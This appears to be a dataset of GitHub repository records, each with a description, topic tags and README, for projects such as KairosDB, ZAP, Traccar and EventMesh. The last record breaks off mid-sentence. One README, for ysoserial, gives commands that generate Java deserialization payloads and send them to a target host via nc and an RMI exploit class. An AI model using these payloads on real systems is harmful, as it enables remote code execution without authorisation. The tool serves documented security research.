![KairosDB](webroot/img/kairosdb.png) [![Build Status](https://travis-ci.org/kairosdb/kairosdb.svg?branch=develop)](https://travis-ci.org/kairosdb/kairosdb) KairosDB is a fast distributed scalable time series database written on top of Cassandra. ## Documentation Documentation is found [here](http://kairosdb.github.io/website/). [Frequently Asked Questions](https://github.com/kairosdb/kairosdb/wiki/Frequently-Asked-Questions) ## Installing Download the latest [KairosDB release](https://github.com/kairosdb/kairosdb/releases). Installation instructions are found [here](http://kairosdb.github.io/docs/build/html/GettingStarted.html) If you want to test KairosDB in Kubernetes please follow the instructions from [KairosDB Helm chart](deployment/helm/README.md). ## Getting Involved Join the [KairosDB discussion group](https://groups.google.com/forum/#!forum/kairosdb-group). ## Contributing to KairosDB Contributions to KairosDB are **very welcome**. KairosDB is mainly developed in Java, but there's a lot of tasks for non-Java programmers too, so don't feel shy and join us! What you can do for KairosDB: - [KairosDB Core](https://github.com/kairosdb/kairosdb): join the development of core features of KairosDB. - [Website](https://github.com/kairosdb/kairosdb.github.io): improve the KairosDB website. - [Documentation](https://github.com/kairosdb/kairosdb/wiki/Contribute:-Documentation): improve our documentation, it's a very important task. If you have any questions about how to contribute to KairosDB, [join our discussion group](https://groups.google.com/forum/#!forum/kairosdb-group) and tell us your issue. ## License The license is the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0)
0
frohoff/ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
deserialization exploit gadget java javadeser jvm poc serialization vulnerability
# ysoserial [![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) [![Travis Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial) [![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master) [![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial) A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. ![logo](ysoserial.png) ## Description Originally released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"]( https://frohoff.github.io/appseccali-marshalling-pickles/) with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). Later updated to include additional gadget chains for [JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries. __ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. ## Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. ## Usage ```shell $ java -jar ysoserial.jar Y SO SERIAL? 
Usage: java -jar ysoserial.jar [payload] '[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 Clojure @JackOfMostTrades clojure:1.8.0 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 CommonsCollections1 @frohoff commons-collections:3.1 CommonsCollections2 @frohoff commons-collections4:4.0 CommonsCollections3 @frohoff commons-collections:3.1 CommonsCollections4 @frohoff commons-collections4:4.0 CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 CommonsCollections6 @matthias_kaiser commons-collections:3.1 CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 Groovy1 @frohoff groovy:2.3.9 Hibernate1 @mbechler Hibernate2 @mbechler JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 JRMPClient @mbechler JRMPListener @mbechler JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 Jdk7u21 @frohoff Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 MozillaRhino1 @matthias_kaiser js:1.7R2 MozillaRhino2 @_tint0 js:1.7R2 Myfaces1 @mbechler Myfaces2 @mbechler ROME @mbechler rome:1.0 Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 URLDNS @gebl Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 ``` ## Examples ```shell $ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat ... 0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov 0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride.......... 0000570: 0078 7071 007e 003a .xpq.~.: $ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin $ nc 10.10.10.10 1099 < groovypayload.bin $ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe ``` ## Installation [![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases. 
## Building Requires Java 1.7+ and Maven 3.x+ ```mvn clean package -DskipTests``` ## Code Status [![Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial) [![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master) ## Contributing 1. Fork it 2. Create your feature branch (`git checkout -b my-new-feature`) 3. Commit your changes (`git commit -am 'Add some feature'`) 4. Push to the branch (`git push origin my-new-feature`) 5. Create new Pull Request ## See Also * [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc. * [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries * [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
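For context on the Description section above, this is a hedged sketch of the vulnerable pattern that ysoserial's payloads target: an application calling `readObject()` on attacker-controlled bytes. The class and method names are hypothetical, for illustration only:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class VulnerableListener {
    // Deserializing untrusted bytes: if suitable gadget classes are on the
    // classpath, readObject() can trigger their side effects during
    // deserialization, before the result is ever cast or used.
    static Object handle(byte[] untrustedBytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(untrustedBytes))) {
            return in.readObject(); // the unsafe call
        }
    }
}
```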
0
zouzg/mybatis-generator-gui
A GUI tool for mybatis-generator that makes code generation simpler and faster
null
mybatis-generator-gui
==============

mybatis-generator-gui is a GUI tool built on top of [mybatis generator](http://www.mybatis.org/generator/index.html). With it you can generate MyBatis Java POJO files and database mapping files very easily and quickly.

![image](https://user-images.githubusercontent.com/3505708/49334784-1a42c980-f619-11e8-914d-9ea85db9cec3.png)
![basic](https://user-images.githubusercontent.com/3505708/51911610-45754980-240d-11e9-85ad-643e55cafab2.png)
![overSSH](https://user-images.githubusercontent.com/3505708/51911646-5920b000-240d-11e9-9048-738306a56d14.png)
![SearchSupport](https://user-images.githubusercontent.com/8142133/115959972-881d2200-a541-11eb-8ad4-052f379b91f1.png)

### Core Features

* Generate code by following simple UI steps, skipping the tedious process of learning and writing XML configuration
* Save database connections and generator configurations, making every code generation effortless
* Common plugins built in, such as a pagination plugin
* OverSSH support: reach databases on your company intranet through an SSH tunnel
* Database column comments become comments on the generated Java entities, keeping the entities clear and readable
* Optionally strip the comments that are unfriendly to version control, so files regenerated after adding or removing columns diff cleanly
* Currently supports MySQL, MySQL 8, Oracle, PostgreSQL, and SQL Server; other niche databases are not supported. (MySQL support is the most mature; please report problems with other databases in an issue)

### Runtime Requirements (Important!!!)

This tool only supports the two most recent Java LTS releases, JDK 8 and JDK 11:
* JDK 1.8 must be version <strong>1.8.0.60</strong> or above
* Java 11 has no version requirement

### Running Directly (Optional)

Running from an IDE is recommended. If you need a binary installer, follow the WeChat official account below to get one; Windows and macOS are currently supported. Note that your JDK must be 1.8 at a version above 1.8.0.60.

### Launching the Software

* Method 1: Follow the WeChat official account "搬砖头也要有态度" and reply "GUI" to get the download link

![image](https://user-images.githubusercontent.com/3505708/61360019-2893dc00-a8b0-11e9-8dc9-a020e997ab87.png)

* Method 2: Build it yourself

```bash
git clone https://github.com/zouzg/mybatis-generator-gui
cd mybatis-generator-gui
mvn jfx:jar
cd target/jfx/app/
java -jar mybatis-generator-gui.jar
```

* Method 3: Run from an IDE. In Eclipse or IntelliJ IDEA, find the `com.zzg.mybatis.generator.MainUI` class and run it (check that the JDK your IDE runs with meets the version requirement)

* Method 4: Package it as a native application and launch it with a double-click on the shortcut

If you don't want the installer's logo to be Java's gray coffee cup, uncomment the icon line for your platform in the pom file before packaging:

```bash
#<icon>${project.basedir}/package/windows/mybatis-generator-gui.ico</icon> is for Windows
#<icon>${project.basedir}/package/macosx/mybatis-generator-gui.icns</icon> is for macOS
mvn jfx:native
```

Also note that building a Windows exe requires WiX Toolset 3+. Because the JRE is bundled into the installer, the package is around 100 MB on either platform, so please build it yourself. The installers are written to target/jfx/native.

### Notes

* This code generator only suits single-table CRUD; for joined database queries, please write new XML and Mapper files yourself;
* On some systems text cannot be typed into the input fields while a Chinese input method is active; switch to an English input method;
* If you are unsure what a field or option means, hover over it for a moment; if an explanation exists it will pop up.

### Documentation

More detailed documentation is in this repository's wiki:

* [Usage](https://github.com/astarring/mybatis-generator-gui/wiki/Usage-Guide)

### Contributing

I open-sourced this tool because I used it in my own projects and found it genuinely useful. If you find it useful too and want to improve it, you can:

* Request features you consider useful in an issue; I will try to implement what I can
* For bugs, please file an issue that includes:
    * How to reproduce the bug, including your OS, JDK version, and database type and version
    * Error screenshots, if you have any
* For common problems such as database connections or the application failing to start, please read the documentation above carefully first; if that doesn't solve it, ask in the group below (include as much information as you can; nobody will want to answer from just a few lines of text).

### QQ Group

Since some users may be unable to use QQ for special reasons, I created a DingTalk group for discussion. DingTalk group number: 35412531 (the original QQ group is no longer offered, as QQ is inconvenient to open)

- - -
Licensed under the Apache 2.0 License

Copyright 2017 by Owen Zou
0
apache/cassandra
Mirror of Apache Cassandra
cassandra database java
null
0
zaproxy/zaproxy
The ZAP core project
appsec dast hacktoberfest security security-scanner zap zap-development zaproxy
# [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap32x32.png) ZAP](https://www.zaproxy.org) [![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html) [![GitHub release](https://img.shields.io/github/release/zaproxy/zaproxy.svg)](https://www.zaproxy.org/download/) [![Java CI](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/ci.yml) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/24/badge)](https://bestpractices.coreinfrastructure.org/projects/24) [![Github Releases](https://img.shields.io/github/downloads/zaproxy/zaproxy/latest/total.svg?maxAge=2592000)](https://zapbot.github.io/zap-mgmt-scripts/downloads.html) [![javadoc](https://javadoc.io/badge2/org.zaproxy/zap/javadoc.svg)](https://javadoc.io/doc/org.zaproxy/zap) [![CodeQL](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml/badge.svg)](https://github.com/zaproxy/zaproxy/actions/workflows/codeql.yml) [![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=zaproxy_zaproxy&metric=alert_status)](https://sonarcloud.io/dashboard?id=zaproxy_zaproxy) [![Open Source Helpers](https://www.codetriage.com/zaproxy/zaproxy/badges/users.svg)](https://www.codetriage.com/zaproxy/zaproxy) [![Twitter Follow](https://img.shields.io/twitter/follow/zaproxy.svg?style=social&label=Follow&maxAge=2592000)](https://twitter.com/zaproxy) ![Integration Tests](https://github.com/zaproxy/zaproxy/actions/workflows/run-integration-tests.yml/badge.svg) ![Docker Live Release](https://github.com/zaproxy/zaproxy/actions/workflows/release-live-docker.yml/badge.svg) The Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing. [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/ZAP-Download.png)](https://www.zaproxy.org/download/) For more details about ZAP see the new ZAP website at [zaproxy.org](https://www.zaproxy.org/) [![](https://raw.githubusercontent.com/wiki/zaproxy/zaproxy/images/zap-website.png)](https://www.zaproxy.org/)
0
traccar/traccar
Traccar GPS Tracking System
gps gps-tracking hacktoberfest java traccar
# [Traccar](https://www.traccar.org) ## Overview Traccar is an open source GPS tracking system. This repository contains Java-based back-end service. It supports more than 200 GPS protocols and more than 2000 models of GPS tracking devices. Traccar can be used with any major SQL database system. It also provides easy to use [REST API](https://www.traccar.org/traccar-api/). Other parts of Traccar solution include: - [Traccar web app](https://github.com/traccar/traccar-web) - [Traccar Manager Android app](https://github.com/traccar/traccar-manager-android) - [Traccar Manager iOS app](https://github.com/traccar/traccar-manager-ios) There is also a set of mobile apps that you can use for tracking mobile devices: - [Traccar Client Android app](https://github.com/traccar/traccar-client-android) - [Traccar Client iOS app](https://github.com/traccar/traccar-client-ios) ## Features Some of the available features include: - Real-time GPS tracking - Driver behaviour monitoring - Detailed and summary reports - Geofencing functionality - Alarms and notifications - Account and device management - Email and SMS support ## Build Please read [build from source documentation](https://www.traccar.org/build/) on the official website. ## Team - Anton Tananaev ([anton@traccar.org](mailto:anton@traccar.org)) - Andrey Kunitsyn ([andrey@traccar.org](mailto:andrey@traccar.org)) ## License Apache License, Version 2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
648540858/wvp-GB28181-pro
WEB VIDEO PLATFORM is a network video platform built on the GB28181-2016 standard. It supports NAT traversal and supports IPC, NVR, and DVR devices from Hikvision, Dahua, Uniview, and other brands. It supports national-standard cascading, forwarding rtsp/rtmp and other streams to national-standard platforms, and forwarding rtsp/rtmp and other pushed streams to national-standard platforms.
28181 28181web gb28181 gb28181server wvp
![logo](doc/_media/logo.png)

# An out-of-the-box GB28181 video platform

[![Build Status](https://travis-ci.org/xia-chu/ZLMediaKit.svg?branch=master)](https://travis-ci.org/xia-chu/ZLMediaKit)
[![license](http://img.shields.io/badge/license-MIT-green.svg)](https://github.com/xia-chu/ZLMediaKit/blob/master/LICENSE)
[![JAVA](https://img.shields.io/badge/language-java-red.svg)](https://en.cppreference.com/)
[![platform](https://img.shields.io/badge/platform-linux%20|%20macos%20|%20windows-blue.svg)](https://github.com/xia-chu/ZLMediaKit)
[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-yellow.svg)](https://github.com/xia-chu/ZLMediaKit/pulls)

WEB VIDEO PLATFORM is an out-of-the-box network video platform built on the GB28181-2016 standard. It implements the core signaling and the device-management backend, supports NAT traversal, and supports IPC and NVR devices from brands such as Hikvision, Dahua, and Uniview. It supports national-standard cascading and can forward cameras without national-standard support, live streams, and pushed live streams to other national-standard platforms.

The media server is based on ZLMediaKit by @夏楚: [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit)

The player is jessibuca by @dexter: [https://github.com/langhuihui/jessibuca/tree/v3](https://github.com/langhuihui/jessibuca/tree/v3)

The front end is based on MediaServerUI by @Kyle, with modifications: [https://gitee.com/kkkkk5G/MediaServerUI](https://gitee.com/kkkkk5G/MediaServerUI)

# Use cases:

Plugin-free camera video playback in the browser.

Access for national-standard devices (cameras, platforms, NVRs, etc.).

Access for non-national-standard devices (onvif, rtsp, rtmp, live-streaming devices, etc.), making full use of existing equipment.

National-standard cascading. Multi-platform cascading. Cross-network video preview.

Platform interconnection across network isolation gateways.

# Documentation

wvp documentation: [https://doc.wvp-pro.cn](https://doc.wvp-pro.cn)

ZLM documentation: [https://github.com/ZLMediaKit/ZLMediaKit](https://github.com/ZLMediaKit/ZLMediaKit)

# Paid community

[![社群](doc/_media/shequ.png "shequ")](https://t.zsxq.com/0d8VAD3Dm)

> Charging lets me provide better service and is also a stronger incentive for the author. Three days after joining the planet you can message me your WeChat ID and I will add you to the group. If you are not satisfied within three days of joining, you can get a direct refund, so there is nothing to worry about; trying it free for three days is fine too.

# Gitee mirror repository

https://gitee.com/pan648540858/wvp-GB28181-pro.git

# Screenshots

![index](doc/_media/index.png "index.png")
![2](doc/_media/2.png "2.png")
![3](doc/_media/3.png "3.png")
![3-1](doc/_media/3-1.png "3-1.png")
![3-2](doc/_media/3-2.png "3-2.png")
![3-3](doc/_media/3-3.png "3-3.png")
![build_1](https://images.gitee.com/uploads/images/2022/0304/101919_ee5b8c79_1018729.png "2022-03-04_10-13.png")

# Features

- [X] Integrated web interface
- [X] Good compatibility
- [X] Electronic map support; accepts both WGS84 and GCJ02 coordinate systems and automatically converts to the appropriate one for display and distribution
- [X] Device access
- [X] Video preview
- [X] Main/sub stream switching
- [X] Unlimited channel count; how many devices you can connect depends only on your server performance
- [X] PTZ control: pan the device, zoom in, zoom out
- [X] Preset positions: query, use, and set
- [X] Query and play recordings on NVR/IPC, with playback and download from a specified time
- [X] Automatic stream teardown when nobody is watching, to save bandwidth
- [X] Video device information synchronization
- [X] Online/offline monitoring
- [X] Direct output of RTSP, RTMP, HTTP-FLV, Websocket-FLV, and HLS stream URLs
- [X] Watch a camera directly through a single stream URL, without logging in or calling any API
- [X] Both UDP and TCP national-standard signaling transport
- [X] Both UDP and TCP national-standard stream transport
- [X] Search and channel filtering
- [X] Channel subdirectory queries
- [X] Audio filtering, to keep noise from spoiling viewing
- [X] National-standard network time synchronization
- [X] H264 and H265 playback
- [X] Alarm handling, with alarm push to the front end
- [X] Voice intercom
- [X] Subscribe and notify methods
- [X] Mobile position subscription
- [X] Mobile position notification handling
- [X] Alarm event subscription
- [X] Alarm event notification handling
- [X] Device catalog subscription
- [X] Device catalog notification handling
- [X] Mobile position query and display
- [X] Manually adding devices and setting per-device passwords
- [X] Platform interconnection
- [X] National-standard cascading
- [X] Cascading national-standard channels upward
- [X] Adding upper-level platforms via the web UI
- [X] Registration
- [X] Heartbeat keepalive
- [X] Channel selection
- [X] Channel push
- [X] On-demand play
- [X] PTZ control
- [X] Platform status query
- [X] Platform information query
- [X] Remote platform start
- [X] Customizable virtual directories for each cascaded platform
- [X] Catalog subscription and notification
- [X] Recording query and playback
- [X] GPS subscription and notification (live push streams)
- [X] Voice intercom
- [X] Automatic ZLM media server configuration, reducing configuration-related problems
- [X] Multiple media nodes, automatically choosing the least-loaded node
- [X] Multi-port UDP mode, improving media transport performance over UDP
- [X] Public-network deployment
- [X] Separate deployment of wvp and zlm, increasing concurrency
- [X] Pulling RTSP/RTMP streams and distributing them in various formats or pushing them to other national-standard platforms
- [X] Pushing RTSP/RTMP streams and distributing them in various formats or pushing them to other national-standard platforms
- [X] Push-stream authentication
- [X] API authentication
- [X] Cloud recording: pushed, proxied, and national-standard video can all be recorded on the cloud server, with preview and download
- [X] Packaging as an executable jar or war
- [X] Cross-origin requests, supporting separate front-end/back-end deployment
- [X] MySQL, PostgreSQL, KingbaseES, and other databases
- [X] Onvif (currently on the onvif branch; requires the onvif service, available in the Knowledge Planet)

# Non-open-source features

- [X] ONVIF device access, with on-demand play, PTZ control, national-standard cascaded play, and automatic play. A trial installer and tutorial, with no time limit, are available in the [Knowledge Planet](https://t.zsxq.com/10WAnH2MP); for the source code, message me on the planet or contact me by email.
- [X] GB28181-2022 support: cruise track query, precise PTZ control, storage card formatting, device software upgrade, OSD configuration, H265+AAC, sub-stream support, reverse recording playback, and more. The full feature list is in the [Knowledge Planet](https://t.zsxq.com/18GXkpkqs); for source code and testing, message me on the planet or send me an email.

# License

This project's own code is under the permissive MIT license and, provided the copyright notice is retained, can be freely used in commercial and non-commercial projects.
The project also uses bits of other open-source code here and there; for commercial use, please replace or remove those yourself.
Commercial disputes or infringement arising from the use of this project have nothing to do with the project or its developers; you assume the legal risk yourself.
When using this project's code, you should also declare the licenses of the third-party libraries it depends on in your own license.

# Technical support

[Knowledge Planet](https://t.zsxq.com/0d8VAD3Dm) column list:

- [Getting started, part 1: what WVP-PRO can do](https://t.zsxq.com/0dLguVoSp)

For paid technical support, send an email to 648540858@qq.com

# Acknowledgements

Thanks to [夏楚](https://github.com/xia-chu) for providing such an excellent open-source media server framework and for the support and help during development.

Thanks to [dexter langhuihui](https://github.com/langhuihui) for open-sourcing such an easy-to-use web player.

Thanks to [Kyle](https://gitee.com/kkkkk5G) for open-sourcing the handy front-end pages.

Thanks to everyone for the sponsorship, corrections, and help with the project, including but not limited to code contributions, issue reports, and donations! In no particular order:

[lawrencehj](https://github.com/lawrencehj) [Smallwhitepig](https://github.com/Smallwhitepig) [swwhaha](https://github.com/swwheihei) [hotcoffie](https://github.com/hotcoffie) [xiaomu](https://github.com/nikmu) [TristingChen](https://github.com/TristingChen) [chenparty](https://github.com/chenparty) [Hotleave](https://github.com/hotleave) [ydwxb](https://github.com/ydwxb) [ydpd](https://github.com/ydpd) [szy833](https://github.com/szy833) [Albertzhu666](https://github.com/Albertzhu666) [mk1990](https://github.com/mk1990) [SaltFish001](https://github.com/SaltFish001)

Thanks also to JetBrains for supporting open-source projects; this project is developed and debugged with IntelliJ IDEA:

![JetBrains](https://resources.jetbrains.com/storage/products/company/brand/logos/IntelliJ_IDEA_icon.svg?_ga=2.143694769.529214288.1712023294-439039083.1711422571&_gl=1*102dv9n*_ga*NDM5MDM5MDgzLjE3MTE0MjI1NzE.*_ga_9J976DJZ68*MTcxMjEyNjg4NC45LjEuMTcxMjEyNzc2My4zMy4wLjA.)
0
apache/eventmesh
EventMesh is a new generation serverless event middleware for building distributed event-driven applications.
cloud-native cqrs esb event-connector event-driven event-gateway event-governance event-mesh event-sourcing event-streaming hacktoberfest message-bus microservice multi-runtime pubsub serverless serverless-workflow
<div align="center">
<br /><br />
<img src="resources/logo.png" width="256">
<br />

[![CI status](https://img.shields.io/github/actions/workflow/status/apache/eventmesh/ci.yml?logo=github&style=for-the-badge)](https://github.com/apache/eventmesh/actions/workflows/ci.yml)
[![CodeCov](https://img.shields.io/codecov/c/gh/apache/eventmesh/master?logo=codecov&style=for-the-badge)](https://codecov.io/gh/apache/eventmesh)
[![Code Quality: Java](https://img.shields.io/lgtm/grade/java/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/context:java)
[![Total Alerts](https://img.shields.io/lgtm/alerts/g/apache/eventmesh.svg?logo=lgtm&logoWidth=18&style=for-the-badge)](https://lgtm.com/projects/g/apache/eventmesh/alerts/)
[![License](https://img.shields.io/github/license/apache/eventmesh?style=for-the-badge)](https://www.apache.org/licenses/LICENSE-2.0.html)
[![GitHub Release](https://img.shields.io/github/v/release/apache/eventmesh?style=for-the-badge)](https://github.com/apache/eventmesh/releases)
[![Slack Status](https://img.shields.io/badge/slack-join_chat-blue.svg?logo=slack&style=for-the-badge)](https://join.slack.com/t/the-asf/shared_invite/zt-1y375qcox-UW1898e4kZE_pqrNsrBM2g)

[📦 Documentation](https://eventmesh.apache.org/docs/introduction) | [📔 Examples](https://github.com/apache/eventmesh/tree/master/eventmesh-examples) | [⚙️ Roadmap](https://eventmesh.apache.org/docs/roadmap) | [🌐 简体中文](README.zh-CN.md)
</div>

# Apache EventMesh

**Apache EventMesh** is a new generation serverless event middleware for building distributed [event-driven](https://en.wikipedia.org/wiki/Event-driven_architecture) applications.

### EventMesh Architecture

![EventMesh Architecture](resources/eventmesh-architecture-4.png)

### EventMesh Dashboard

![EventMesh Dashboard](resources/dashboard.png)

## Features

Apache EventMesh has a vast set of features to help users achieve their goals. Let us share with you some of the key features EventMesh has to offer:

- Built around the [CloudEvents](https://cloudevents.io) specification.
- Rapidly extensible interconnector layer of [connectors](https://github.com/apache/eventmesh/tree/master/eventmesh-connectors) using [openConnect](https://github.com/apache/eventmesh/tree/master/eventmesh-openconnect), such as sources and sinks for SaaS, cloud services, and databases.
- Rapidly extensible storage layer, such as [Apache RocketMQ](https://rocketmq.apache.org), [Apache Kafka](https://kafka.apache.org), [Apache Pulsar](https://pulsar.apache.org), [RabbitMQ](https://rabbitmq.com), [Redis](https://redis.io).
- Rapidly extensible meta service, such as [Consul](https://consulproject.org/en/), [Nacos](https://nacos.io), [ETCD](https://etcd.io) and [Zookeeper](https://zookeeper.apache.org/).
- Guaranteed at-least-once delivery.
- Delivery of events between multiple EventMesh deployments.
- Event schema management via a catalog service.
- Powerful event orchestration via a [Serverless workflow](https://serverlessworkflow.io/) engine.
- Powerful event filtering and transformation.
- Rapid, seamless scalability.
- Easy function development and framework integration.

## Roadmap

Please go to the [roadmap](https://eventmesh.apache.org/docs/roadmap) to get the release history and new features of Apache EventMesh.

## Subprojects

- [EventMesh-site](https://github.com/apache/eventmesh-site): Apache official website resources for EventMesh.
- [EventMesh-workflow](https://github.com/apache/eventmesh-workflow): Serverless workflow runtime for event Orchestration on EventMesh. - [EventMesh-dashboard](https://github.com/apache/eventmesh-dashboard): Operation and maintenance console of EventMesh. - [EventMesh-catalog](https://github.com/apache/eventmesh-catalog): Catalog service for event schema management using AsyncAPI. - [EventMesh-go](https://github.com/apache/eventmesh-go): A go implementation for EventMesh runtime. ## Quick start This section of the guide will show you the steps to deploy EventMesh from [Local](#run-eventmesh-runtime-locally), [Docker](#run-eventmesh-runtime-in-docker), [K8s](#run-eventmesh-runtime-in-kubernetes). This section guides the launch of EventMesh according to the default configuration, if you need more detailed EventMesh deployment steps, please visit the [EventMesh official document](https://eventmesh.apache.org/docs/introduction). ### Deployment Event Store > EventMesh supports [multiple Event Stores](https://eventmesh.apache.org/docs/roadmap#event-store-implementation-status), the default storage mode is `standalone`, and does not rely on other event stores as layers. ### Run EventMesh Runtime locally #### 1. Download EventMesh Download the latest version of the Binary Distribution from the [EventMesh Download](https://eventmesh.apache.org/download/) page and extract it: ```shell wget https://dlcdn.apache.org/eventmesh/1.10.0/apache-eventmesh-1.10.0-bin.tar.gz tar -xvzf apache-eventmesh-1.10.0-bin.tar.gz cd apache-eventmesh-1.10.0 ``` #### 2. Run EventMesh Execute the `start.sh` script to start the EventMesh Runtime server. ```shell bash bin/start.sh ``` View the output log: ```shell tail -n 50 -f logs/eventmesh.out ``` When the log output shows server `state:RUNNING`, it means EventMesh Runtime has started successfully. You can stop the run with the following command: ```shell bash bin/stop.sh ``` When the script prints `shutdown server ok!`, it means EventMesh Runtime has stopped. ### Run EventMesh Runtime in Docker #### 1. Pull EventMesh Image Use the following command line to download the latest version of [EventMesh](https://hub.docker.com/r/apache/eventmesh): ```shell sudo docker pull apache/eventmesh:latest ``` #### 2. Run and Manage EventMesh Container Use the following command to start the EventMesh container: ```shell sudo docker run -d --name eventmesh -p 10000:10000 -p 10105:10105 -p 10205:10205 -p 10106:10106 -t apache/eventmesh:latest ``` Enter the container: ```shell sudo docker exec -it eventmesh /bin/bash ``` view the log: ```shell cd logs tail -n 50 -f eventmesh.out ``` ### Run EventMesh Runtime in Kubernetes #### 1. Deploy operator Run the following commands(To delete a deployment, simply replace `deploy` with `undeploy`): ```shell $ cd eventmesh-operator && make deploy ``` Run `kubectl get pods` 、`kubectl get crd | grep eventmesh-operator.eventmesh`to see the status of the deployed eventmesh-operator. ```shell $ kubectl get pods NAME READY STATUS RESTARTS AGE eventmesh-operator-59c59f4f7b-nmmlm 1/1 Running 0 20s $ kubectl get crd | grep eventmesh-operator.eventmesh connectors.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z runtimes.eventmesh-operator.eventmesh 2024-01-10T02:40:27Z ``` #### 2. Deploy EventMesh Runtime Execute the following command to deploy runtime, 